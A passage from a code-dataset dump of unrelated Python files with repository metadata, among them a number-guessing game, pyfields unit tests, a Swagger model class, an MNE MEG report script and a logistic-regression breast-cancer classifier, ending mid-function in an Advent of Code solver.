feat_A, feat_B = dtw_alignment(feat_A, feat_B)\n\n # exemplar_A = make_exemplar_dict_A(dtw_paths, feat_A)\n # exemplar_R = make_exemplar_dict_R(dtw_paths, feat_B)\n logging.info(\"===================================================\")\n exemplar_W_A, exemplar_W_B = make_exemplar_dict_W(dtw_paths)\n\n logging.info(\"Save dtw-paths to .pkl\")\n io_save_exemplar_dictionaries({\n # 'exemplar_A': exemplar_A,\n # 'exemplar_R': exemplar_R,\n 'exemplar_W_A': exemplar_W_A,\n 'exemplar_W_B': exemplar_W_B\n })\n\n # exemplars = make_dict_from_feat(feat_A, feat_B)\n # print(exemplars[0].shape, exemplars[1].shape)\n #\n # # Dump to npy\n # os.system(\"mkdir -p \" + feature_path)\n # # with open(os.path.join(feature_path, speakerA + \"2\" + speakerB + \"_mfcc_25ms_10ms_norm\" + \".pkl\"), \"wb\") as f:\n # with open(os.path.join(feature_path, \"{}2{}_{}_{}ms_{}ms.pkl\".format(\n # speakerA, speakerB, 'mcep', int(frame_length * 1000 / sr), int(hop_length * 1000 / sr))), \"wb\") as f:\n # pickle.dump(exemplars, f, protocol=3)\n\n # np.save(os.path.join(feature_path, speakerA + \"2\" + speakerB + \"_mfcc\" + \".npy\"), exemplars)\n\n\ndef debug_profiling_main():\n start = time.time()\n cProfile.run('final_make_dict()')\n logging.info(\"Elapsed time: {}\".format(time.time() - start))\n\n\nif __name__ == \"__main__\":\n final_make_dict()\n # cProfile.run('final_make_dict()', )\n","repo_name":"entn-at/exemplars_vc","sub_path":"01_make_dict_parallel.py","file_name":"01_make_dict_parallel.py","file_ext":"py","file_size_in_byte":14498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1733569132","text":"#Guess the number the computer has in mind.\nimport random\n\ndef guess(num,allowedCount):\n randomNum = random.randint(1, num)\n guess = 0\n count = 0\n while guess != randomNum and count != allowedCount:\n guess = int(input(\"Guess the number: \"))\n count += 1\n tries = allowedCount - count\n if guess < randomNum:\n print(f\"Guess again, value is too low. You have {tries} tries left!\")\n elif guess > randomNum:\n print(f\"Guess again, value is too high. You have {tries} tries left!\")\n if guess != randomNum and count == allowedCount:\n print(f\"Better Luck Next Time, the value was {randomNum}.\")\n else:\n print(f'Congratulations!!!, You have guessed {randomNum} correctly in {count} tries!!!')\n\ndef guessComp(num):\n low = 1\n high = num\n feedback = \"\"\n count = 0\n while feedback != \"c\":\n if low != high:\n guess = random.randint(low,high)\n else:\n guess = low\n count += 1\n feedback = input(f\"The computer guessed {guess}. is it higher(H), lower(L) or Correct(C)??\").lower()\n if feedback == 'h':\n high = guess - 1\n elif feedback == 'l':\n low = guess + 1\n print(f\"The computer found your number ({guess}) in {count} tries!!!\")\n\nprint(\"GUESS THE NUMBER\")\nprint('Select a level of difficulty \\n \\\npress 1 for Easy \\n \\\npress 2 for Medium \\n \\\npress 3 for Hard \\n\\n \\\npress 5 to play Computer guess your number')\n\ntry:\n level = int(input())\n if level == 1:\n print('Easy Difficulty - 1 to 10 \\n You have 3 Guesses.')\n guess(10,3)\n elif level == 2:\n print('Medium Difficulty - 1 to 40 \\n You have 5 Guesses.')\n guess(40,5)\n elif level ==3:\n print('Hard Difficulty - 1 to 100 \\n You have 5 Guesses.')\n guess(100,5)\n elif level == 5:\n high = int(input('Provide the range which include your number: '))\n guessComp(high)\n else:\n print(\"Please make a valid selection.\")\nexcept:\n print(\"Enter a valid input\")\n","repo_name":"InvisiblePro/Hacktoberfest-2022","sub_path":"Python/Guess_the_number.py","file_name":"Guess_the_number.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"34752264654","text":"import os\nimport sys\nimport timeit\n\nimport pytest\nfrom valid8 import ValidationError, ValidationFailure\n\nfrom pyfields import field, MandatoryFieldInitError, make_init, init_fields, ReadOnlyFieldError, NoneError, \\\n FieldTypeError, autoclass, get_fields\n\n\ndef test_lazy_fields():\n\n class Wall(object):\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n # create an instance\n w = Wall()\n\n # the field is visible in `dir`\n assert dir(w)[-2:] == ['color', 'height']\n\n # but not yet in `vars`\n assert vars(w) == dict()\n\n # lets ask for it - default value is affected\n print(w.color)\n\n # now it is in `vars` too\n assert vars(w) == {'color': 'white'}\n\n # mandatory field\n with pytest.raises(MandatoryFieldInitError) as exc_info:\n print(w.height)\n assert str(exc_info.value).startswith(\"Mandatory field 'height' has not been initialized yet on instance <\")\n\n w.height = 12\n assert vars(w) == {'color': 'white', 'height': 12}\n\n\n@pytest.mark.parametrize(\"use_decorator\", [False, True], ids=\"use_decorator={}\".format)\ndef test_default_factory(use_decorator):\n\n class BadPocket(object):\n items = field(default=[])\n\n p = BadPocket()\n p.items.append('thing')\n g = BadPocket()\n assert g.items == ['thing']\n\n if use_decorator:\n class Pocket:\n items = field()\n\n @items.default_factory\n def default_items(self):\n return []\n else:\n class Pocket(object):\n items = field(default_factory=lambda obj: [])\n\n p = Pocket()\n g = Pocket()\n p.items.append('thing')\n assert p.items == ['thing']\n assert g.items == []\n\n\ndef test_readonly_field():\n \"\"\" checks that the example in the readme is correct \"\"\"\n\n class User(object):\n name = field(read_only=True)\n\n u = User()\n u.name = \"john\"\n assert \"name: %s\" % u.name == \"name: john\"\n with pytest.raises(ReadOnlyFieldError) as exc_info:\n u.name = \"john2\"\n qualname = User.__dict__['name'].qualname\n assert str(exc_info.value) == \"Read-only field '%s' has already been \" \\\n \"initialized on instance %s and cannot be modified anymore.\" % (qualname, u)\n\n class User(object):\n name = field(read_only=True, default=\"dummy\")\n\n u = User()\n assert \"name: %s\" % u.name == \"name: dummy\"\n with pytest.raises(ReadOnlyFieldError):\n u.name = \"john\"\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_type_validation(py36_style_type_hints):\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import _test_readme_type_validation\n Wall = _test_readme_type_validation()\n else:\n class Wall(object):\n height = field(type_hint=int, check_type=True, doc=\"Height of the wall in mm.\")\n color = field(type_hint=str, check_type=True, default='white', doc=\"Color of the wall.\")\n\n w = Wall()\n w.height = 1\n with pytest.raises(TypeError):\n w.height = \"1\"\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_value_validation(py36_style_type_hints):\n colors = ('blue', 'red', 'white')\n\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import _test_readme_value_validation\n Wall = _test_readme_value_validation(colors)\n\n from mini_lambda import x\n from valid8.validation_lib import is_in\n\n class Wall(object):\n height = field(type_hint=int,\n validators={'should be a positive number': x > 0,\n 'should be a multiple of 100': x % 100 == 0},\n doc=\"Height of the wall in mm.\")\n color = field(type_hint=str,\n validators=is_in(colors),\n default='white', doc=\"Color of the wall.\")\n\n w = Wall()\n w.height = 100\n with pytest.raises(ValidationError) as exc_info:\n w.height = 1\n assert \"Successes: ['x > 0'] / Failures: {\" \\\n \"'x % 100 == 0': 'InvalidValue: should be a multiple of 100. Returned False.'\" \\\n \"}.\" in str(exc_info.value)\n\n with pytest.raises(ValidationError) as exc_info:\n w.color = 'magenta'\n assert \"NotInAllowedValues: x in ('blue', 'red', 'white') does not hold for x=magenta. Wrong value: 'magenta'.\" \\\n in str(exc_info.value)\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_value_validation_advanced(py36_style_type_hints):\n\n class InvalidWidth(ValidationFailure):\n help_msg = 'should be a multiple of the height ({height})'\n\n def validate_width(obj, width):\n if width % obj.height != 0:\n raise InvalidWidth(width, height=obj.height)\n\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import test_value_validation_advanced\n Wall = test_value_validation_advanced(validate_width)\n else:\n class Wall(object):\n height = field(type_hint=int,\n doc=\"Height of the wall in mm.\")\n width = field(type_hint=str,\n validators=validate_width,\n doc=\"Width of the wall in mm.\")\n\n w = Wall()\n w.height = 100\n w.width = 200\n\n with pytest.raises(ValidationError) as exc_info:\n w.width = 201\n assert \"InvalidWidth: should be a multiple of the height (100). Wrong value: 201.\" in str(exc_info.value)\n\ntry:\n from typing import Optional\n typing_present = True\nexcept ImportError:\n typing_present = False\n\n\n@pytest.mark.skipif(not typing_present, reason=\"typing module is not present\")\n@pytest.mark.parametrize(\"declaration\", ['typing', 'default_value', 'explicit_nonable'], ids=\"declaration={}\".format)\ndef test_nonable_fields(declaration):\n \"\"\"Tests that nonable fields are supported and correctly handled\"\"\"\n\n if declaration == 'typing':\n from typing import Optional\n \n class Foo(object):\n a = field(type_hint=Optional[int], check_type=True)\n b = field(type_hint=Optional[int], validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n elif declaration == 'default_value':\n class Foo(object):\n a = field(type_hint=int, default=None, check_type=True)\n b = field(type_hint=int, default=None, validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n elif declaration == 'explicit_nonable':\n class Foo(object):\n a = field(type_hint=int, nonable=True, check_type=True)\n b = field(type_hint=int, nonable=True, validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n else:\n raise ValueError(declaration)\n\n f = Foo()\n f.a = None\n f.b = None\n with pytest.raises(NoneError):\n f.c = None\n f.d = None\n f.e = None\n assert vars(f) == {'_a': None, '_b': None, '_d': None, 'e': None}\n\n\ndef test_native_descriptors():\n \"\"\"\"\"\"\n class Foo:\n a = field()\n b = field(native=False)\n\n a_name = \"test_native_descriptors..Foo.a\" if sys.version_info >= (3, 6) else \".None\"\n b_name = \"test_native_descriptors..Foo.b\" if sys.version_info >= (3, 6) else \".None\"\n assert repr(Foo.__dict__['a']) == \"\" % a_name\n assert repr(Foo.__dict__['b']) == \"\" % b_name\n\n f = Foo()\n\n def set_native(): f.a = 12\n\n def set_descript(): f.b = 12\n\n def set_pynative(): f.c = 12\n\n # make sure that the access time for native field and native are identical\n # --get rid of the first init since it is a bit longer (replacement of the descriptor with a native field\n set_native()\n set_descript()\n set_pynative()\n\n # --now compare the executiong= times\n t_native = timeit.Timer(set_native).timeit(10000000)\n t_descript = timeit.Timer(set_descript).timeit(10000000)\n t_pynative = timeit.Timer(set_pynative).timeit(10000000)\n\n print(\"Average time (ns) setting the field:\")\n print(\"%0.2f (normal python) ; %0.2f (native field) ; %0.2f (descriptor field)\"\n % (t_pynative, t_native, t_descript))\n\n ratio = t_native / t_pynative\n print(\"Ratio is %.2f\" % ratio)\n assert ratio <= 1.2\n\n\n# def decompose(number):\n# \"\"\" decompose a number in scientific notation. from https://stackoverflow.com/a/45359185/7262247\"\"\"\n# (sign, digits, exponent) = Decimal(number).as_tuple()\n# fexp = len(digits) + exponent - 1\n# fman = Decimal(number).scaleb(-fexp).normalize()\n# return fman, fexp\n\n\ndef test_make_init_full_defaults():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n __init__ = make_init()\n\n # create an instance\n help(Wall)\n with pytest.raises(TypeError) as exc_info:\n Wall()\n assert str(exc_info.value).startswith(\"__init__()\")\n\n w = Wall(2)\n assert vars(w) == {'color': 'white', 'height': 2}\n\n w = Wall(color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12}\n\n\ndef test_make_init_with_explicit_list():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n # only `height` will be in the constructor\n __init__ = make_init(height)\n\n with pytest.raises(TypeError) as exc_info:\n Wall(1, 'blue')\n assert str(exc_info.value).startswith(\"__init__()\")\n\n\ndef test_make_init_with_inheritance():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n __init__ = make_init(height)\n\n class ColoredWall(Wall):\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n __init__ = make_init(Wall.height, color)\n\n w = ColoredWall(2)\n assert vars(w) == {'color': 'white', 'height': 2}\n\n w = ColoredWall(color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12}\n\n\ndef test_make_init_callback():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n def post_init(self, msg='hello'):\n \"\"\"\n After initialization, some print message is done\n :param msg: the message details to add\n :return:\n \"\"\"\n print(\"post init ! height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg\n\n # only `height` and `foo` will be in the constructor\n __init__ = make_init(height, post_init_fun=post_init)\n\n w = Wall(1, 'hey')\n assert vars(w) == {'color': 'white', 'height': 1, 'non_field_attr': 'hey'}\n\n\ndef test_init_fields():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n @init_fields\n def __init__(self, msg='hello'):\n \"\"\"\n After initialization, some print message is done\n :param msg: the message details to add\n :return:\n \"\"\"\n print(\"post init ! height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg\n\n # create an instance\n help(Wall.__init__)\n with pytest.raises(TypeError) as exc_info:\n Wall()\n assert str(exc_info.value).startswith(\"__init__()\")\n\n w = Wall(2)\n assert vars(w) == {'color': 'white', 'height': 2, 'non_field_attr': 'hello'}\n\n w = Wall(msg='hey', color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12, 'non_field_attr': 'hey'}\n\n\nno_type_checker = False\ntry:\n import typeguard\nexcept ImportError:\n try:\n import pytypes\n except ImportError:\n no_type_checker = True\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"python < 3.6 does not support class member type hints\")\n@pytest.mark.skipif(no_type_checker, reason=\"no type checker is installed\")\ndef test_autofields_readme():\n \"\"\"Test for readme on autofields\"\"\"\n\n from ._test_py36 import _test_autofields_readme\n Pocket, Item, Pocket2 = _test_autofields_readme()\n\n with pytest.raises(TypeError):\n Item()\n\n item1 = Item(name='1')\n pocket1 = Pocket(size=2)\n pocket2 = Pocket(size=2)\n\n # make sure that custom constructor is not overridden by @autofields\n pocket3 = Pocket2(\"world\")\n with pytest.raises(MandatoryFieldInitError):\n pocket3.size\n\n # make sure the items list is not the same in both (if we add the item to one, they do not appear in the 2d)\n assert pocket1.size == 2\n assert pocket1.items is not pocket2.items\n pocket1.items.append(item1)\n assert len(pocket2.items) == 0\n\n\ntry:\n import pytypes\nexcept ImportError:\n has_pytypes = False\nelse:\n has_pytypes = True\n\n\n@pytest.mark.skipif(has_pytypes, reason=\"pytypes does not correctly support vtypes - \"\n \"see https://github.com/Stewori/pytypes/issues/86\")\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"python < 3.6 does not support class member type hints\")\ndef test_autofields_vtypes_readme():\n\n from ._test_py36 import _test_autofields_vtypes_readme\n Rectangle = _test_autofields_vtypes_readme()\n\n r = Rectangle(1, 2)\n with pytest.raises(FieldTypeError):\n Rectangle(1, -2)\n with pytest.raises(FieldTypeError):\n Rectangle('1', 2)\n\n\ndef test_autoclass():\n \"\"\" Tests the example with autoclass in the doc \"\"\"\n @autoclass\n class Foo(object):\n msg = field(type_hint=str)\n age = field(default=12, type_hint=int)\n\n foo = Foo(msg='hello')\n\n assert [f.name for f in get_fields(Foo)] == ['msg', 'age']\n\n print(foo) # automatic string representation\n print(foo.to_dict()) # dict view\n\n assert str(foo) == \"Foo(msg='hello', age=12)\"\n assert str(foo.to_dict()) in (\"{'msg': 'hello', 'age': 12}\", \"{'age': 12, 'msg': 'hello'}\")\n assert foo == Foo(msg='hello', age=12) # comparison (equality)\n assert foo == {'msg': 'hello', 'age': 12} # comparison with dicts\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"not valid for old python\")\ndef test_autoclass_2():\n from ._test_py36 import _test_autoclass2\n Foo = _test_autoclass2()\n\n # assert [f.name for f in get_fields(Foo)] == ['msg', 'age', 'height']\n\n foo = Foo(msg='hello')\n\n assert repr(foo) == \"Foo(msg='hello', age=12, height=50)\" # automatic string representation\n assert str(foo.to_dict()) # automatic dict view\n\n assert foo == Foo(msg='hello', age=12, height=50) # automatic equality comparison\n assert foo == {'msg': 'hello', 'age': 12, 'height': 50} # automatic eq comparison with dicts\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"not valid for old python\")\ndef test_autoclass_3():\n from ._test_py36 import _test_autoclass3\n Foo = _test_autoclass3()\n\n # assert [f.name for f in get_fields(Foo)] == ['msg', 'age', 'height']\n\n foo = Foo(msg='hello')\n\n with pytest.raises(AttributeError):\n foo.to_dict() # method does not exist\n\n assert repr(foo) == \"Foo(msg='hello', age=12, height=50)\" # automatic string representation\n assert foo == Foo(msg='hello', age=12, height=50) # automatic equality comparison\n\n # type checking ON\n with pytest.raises(FieldTypeError):\n foo.msg = 1\n","repo_name":"smarie/python-pyfields","sub_path":"pyfields/tests/test_readme.py","file_name":"test_readme.py","file_ext":"py","file_size_in_byte":16554,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"21352462697","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nvocab = [\"mobile\",\"samsung\",\"sam\",\"sung\",\n \"man\",\"mango\",\"icecream\",\"and\",\n \"go\",\"i\",\"like\",\"ice\",\"cream\"]\n\ndef f(inp):\n n = len(inp)\n if n == 0:\n return True\n for i in range(n+1):\n if inp[0:i] in vocab and f(inp[i:]):\n return True\n return False\n \n \ninp = 'ilikesamsungandicecream'\nprint(f(inp))\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"dp/Word_Break/recursive.py","file_name":"recursive.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"20871611792","text":"import unittest\nfrom numpy import cos, log, pi as PI, sin\n\nfrom numeric.e2.rotation import Rotation\n\n\nclass BasicTestSuite(unittest.TestCase):\n\n def f(self, x):\n return sin(x)\n\n interval = [PI, 7 * PI]\n angle = PI / 8\n x = 3\n\n def test_rotated_interval(self):\n\n rotation = Rotation(self.f, self.interval, self.angle)\n interval_rotated = rotation.get_interval_after_rotation()\n left_expected = self.interval[0] * cos(self.angle) - self.f(self.interval[0]) * sin(self.angle)\n right_expected = self.interval[1] * cos(self.angle) - self.f(self.interval[1]) * sin(self.angle)\n self.assertAlmostEqual(left_expected, interval_rotated[0])\n self.assertAlmostEqual(right_expected, interval_rotated[1])\n\n def test_point_before_rotation(self):\n expected_point_before_rotation = [self.x, self.f(self.x)]\n expected_point_after_rotation = [self.x * cos(self.angle) - self.f(self.x) * sin(self.angle),\n self.x * sin(self.angle) + self.f(self.x) * cos(self.angle)]\n\n rotation = Rotation(self.f, self.interval, self.angle)\n rotation.approximate_rotated_y(expected_point_after_rotation[0])\n actual_point_before_rotation = rotation.get_point_before_rotation()\n\n self.assertAlmostEqual(expected_point_before_rotation[0], actual_point_before_rotation[0])\n self.assertAlmostEqual(expected_point_before_rotation[1], actual_point_before_rotation[1])\n\n def test_point_after_rotation(self):\n expected_point_after_rotation = [self.x * cos(self.angle) - self.f(self.x) * sin(self.angle),\n self.x * sin(self.angle) + self.f(self.x) * cos(self.angle)]\n\n rotation = Rotation(self.f, self.interval, self.angle)\n rotation.approximate_rotated_y(expected_point_after_rotation[0])\n actual_point_after_rotation = rotation.get_point_after_rotation()\n\n self.assertAlmostEqual(expected_point_after_rotation[0], actual_point_after_rotation[0])\n self.assertAlmostEqual(expected_point_after_rotation[1], actual_point_after_rotation[1])\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"macksimiljan/num3ric","sub_path":"tests/e2/test_rotation.py","file_name":"test_rotation.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1104211349","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.network_identifier import NetworkIdentifier # noqa: F401,E501\nfrom swagger_server.models.partial_block_identifier import PartialBlockIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass BlockRequest(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, network_identifier: NetworkIdentifier=None, block_identifier: PartialBlockIdentifier=None): # noqa: E501\n \"\"\"BlockRequest - a model defined in Swagger\n\n :param network_identifier: The network_identifier of this BlockRequest. # noqa: E501\n :type network_identifier: NetworkIdentifier\n :param block_identifier: The block_identifier of this BlockRequest. # noqa: E501\n :type block_identifier: PartialBlockIdentifier\n \"\"\"\n self.swagger_types = {\n 'network_identifier': NetworkIdentifier,\n 'block_identifier': PartialBlockIdentifier\n }\n\n self.attribute_map = {\n 'network_identifier': 'network_identifier',\n 'block_identifier': 'block_identifier'\n }\n self._network_identifier = network_identifier\n self._block_identifier = block_identifier\n\n @classmethod\n def from_dict(cls, dikt) -> 'BlockRequest':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The BlockRequest of this BlockRequest. # noqa: E501\n :rtype: BlockRequest\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def network_identifier(self) -> NetworkIdentifier:\n \"\"\"Gets the network_identifier of this BlockRequest.\n\n\n :return: The network_identifier of this BlockRequest.\n :rtype: NetworkIdentifier\n \"\"\"\n return self._network_identifier\n\n @network_identifier.setter\n def network_identifier(self, network_identifier: NetworkIdentifier):\n \"\"\"Sets the network_identifier of this BlockRequest.\n\n\n :param network_identifier: The network_identifier of this BlockRequest.\n :type network_identifier: NetworkIdentifier\n \"\"\"\n if network_identifier is None:\n raise ValueError(\"Invalid value for `network_identifier`, must not be `None`\") # noqa: E501\n\n self._network_identifier = network_identifier\n\n @property\n def block_identifier(self) -> PartialBlockIdentifier:\n \"\"\"Gets the block_identifier of this BlockRequest.\n\n\n :return: The block_identifier of this BlockRequest.\n :rtype: PartialBlockIdentifier\n \"\"\"\n return self._block_identifier\n\n @block_identifier.setter\n def block_identifier(self, block_identifier: PartialBlockIdentifier):\n \"\"\"Sets the block_identifier of this BlockRequest.\n\n\n :param block_identifier: The block_identifier of this BlockRequest.\n :type block_identifier: PartialBlockIdentifier\n \"\"\"\n if block_identifier is None:\n raise ValueError(\"Invalid value for `block_identifier`, must not be `None`\") # noqa: E501\n\n self._block_identifier = block_identifier\n","repo_name":"xanimo/rosetta-api","sub_path":"server/python-flask-server-generated/swagger_server/models/block_request.py","file_name":"block_request.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26922470953","text":"def count_ways(n):\n if n<=1:\n return 1\n d=[0]*(n+1)\n d[1]=1\n for i in range(2,n+1):\n d[i]+=d[i-1]\n d[i]+=d[i-3]\n if i%2==0:\n d[i]+=d[i//2]\n return d[n]\nn = int(input(('Введите значение n: ')))\nresult = count_ways(n)\nprint(f'Кол-во способов достичь {n} из точки 1: {result}')\n","repo_name":"setusq/PraktikaG34N6","sub_path":"pz6/dynamic_prog.py","file_name":"dynamic_prog.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24983233708","text":"import mne\nfrom mne.report import Report\nimport basic.process as process\nimport eelbrain as E\nimport os\nfrom mayavi import mlab\nmlab.options.offscreen = True\n\ne = process.NMG(None, '{home}')\nraw = 'calm_fft_hp1_lp40'\ne.set(raw = raw)\ne.set(analysis='data_quality')\n# report = Report()\n\nfor subject in subjects:\n# for _ in e:\n e.set(subject=subject)\n ds = e.load_events()\n ds = ds[ds['target'] == 'prime']\n ds = e.make_epochs(ds, tmin=-.2, tmax=.6, reject={'mag': 3e-12}, baseline=(None, 0))\n # covariance\n if 'epochs' in ds:\n ds = ds.aggregate('target', drop_bad=True)\n cov = e.get('cov', raw = raw + '_auto')\n if os.path.exists(cov):\n cov = mne.read_cov(e.get('cov', raw=raw + '_auto') )\n picks = mne.pick_types(ds['epochs'][0].info)\n evoked_white = mne.cov.whiten_evoked(ds['epochs'][0], cov, picks, diag=True)\n p = evoked_white.plot(picks=picks, unit=False, hline=[-2, 2], show=False)\n report.add_figs_to_section(p, [e.subject + '_cov'], 'Covariance')\n # coregistration\n p = mne.viz.plot_trans(ds.info['raw'].info, trans_fname=e.get('trans'),\n subject=e.subject, subjects_dir=e.get('mri_dir'),\n ch_type='meg', source='head')\n report.add_figs_to_section(p, [e.subject + '_coreg'], 'Coregistration')\n # bem\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'coronal', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_coronal'], 'Bem Coronal')\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'axial', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_axial'], 'Bem Axial')\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'sagittal', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_tranverse'], 'Bem Sagittal')\n \n\nreport.save(e.get('report-file'), open_browser=False)","repo_name":"teonbrooks/NMG-project","sub_path":"exp_scripts/3_mne_report.py","file_name":"3_mne_report.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36028005217","text":"import warnings\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.linear_model.coordinate_descent import ConvergenceWarning\nfrom sklearn.model_selection import train_test_split # 数据划分的类\nfrom sklearn.preprocessing import StandardScaler # 数据标准化\n\n# 设置字符集,防止中文乱码\nmpl.rcParams['font.sans-serif'] = [u'simHei']\nmpl.rcParams['axes.unicode_minus'] = False\n# 拦截异常\nwarnings.filterwarnings(action='ignore', category=ConvergenceWarning)\n\npath = \"datas/breast-cancer-wisconsin.data\"\nnames = ['id', 'Clump Thickness', 'Uniformity of Cell Size', 'Uniformity of Cell Shape',\n 'Marginal Adhesion', 'Single Epithelial Cell Size', 'Bare Nuclei', 'Bland Chromatin', 'Normal Nucleoli',\n 'Mitoses', 'Class']\n\ndf = pd.read_csv(path, header=None, names=names)\n\ndata = df.replace('?', np.nan).dropna(how='any') # 只要有列为空,就进行删除操作\n\nprint(data.head(5))\n\n# 1.数据提取以及数据分割\n# 提取\nX = data[names[1:10]]\nY = data[names[10]]\n\n# 分割\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n# 2.数据格式化(归一化)\nss = StandardScaler()\nX_train = ss.fit_transform(X_train) # 训练模型及归一化数据\n\n# 3.模型构建及训练\n\nlr = LogisticRegressionCV(multi_class='ovr', fit_intercept=True, Cs=np.logspace(-2, 2, 20), cv=2, penalty='l2',\n solver='lbfgs', tol=0.01)\nre = lr.fit(X_train, Y_train)\n\nr = re.score(X_train, Y_train)\n\n# 4.模型效果获取\nprint(\"R值(准确率):\", r)\nprint(\"稀疏化特征比率:%.2f%%\" % (np.mean(lr.coef_.ravel() == 0) * 100))\nprint(\"参数:\", re.coef_)\nprint(\"截距:\", re.intercept_)\nprint(re.predict_proba(X_test)) # 获取sigmoid函数返回的概率值\n\n# 5.模型相关信息保存\njoblib.dump(lr, \"result/ss.model\")\n\noss = joblib.load(\"result/ss.model\")\n\n# # 数据预测\n# a.预测数据格式化(归一化)\nX_test = ss.transform(X_test) # 使用模型进行归一化操作\n\n# b.结果数据预测\nY_predict = oss.predict(X_test)\n\n# 图标展示\nx_len = range(len(X_test))\nplt.figure(figsize=(14, 7), facecolor='w')\nplt.ylim(0, 6)\nplt.plot(x_len, Y_test, 'ro', markersize=8, zorder=3, label=u'真实值')\nplt.plot(x_len, Y_predict, 'go', markersize=15, zorder=2, label=u'预测值,$R^2$=%.3f' % re.score(X_test, Y_test))\nplt.legend(loc='upper left')\nplt.xlabel(u'数据编号', fontsize=18)\nplt.xlabel(u'乳腺癌类型', fontsize=18)\nplt.title(u'Logistic回归算法对数据进行分类', fontsize=20)\nplt.show()\n","repo_name":"myDemoMike/MachineLearning","sub_path":"003LinearRegression/逻辑回归:乳腺癌分类.py","file_name":"逻辑回归:乳腺癌分类.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30910866638","text":"def part1(nums):\n jolt_1 = 0\n jolt_3 = 0\n base = 0\n for i in range(len(nums)):\n jolt = min([x for x in nums if base < x <= (base + 3)])\n if (jolt - base) == 1:\n jolt_1 += 1\n if (jolt - base) == 3:\n jolt_3 += 1\n base = jolt\n\n return jolt_1 * (jolt_3 + 1)\n\n\ndef dist_ways_ways(nums, base, index, inf):\n if base == max(nums):\n return 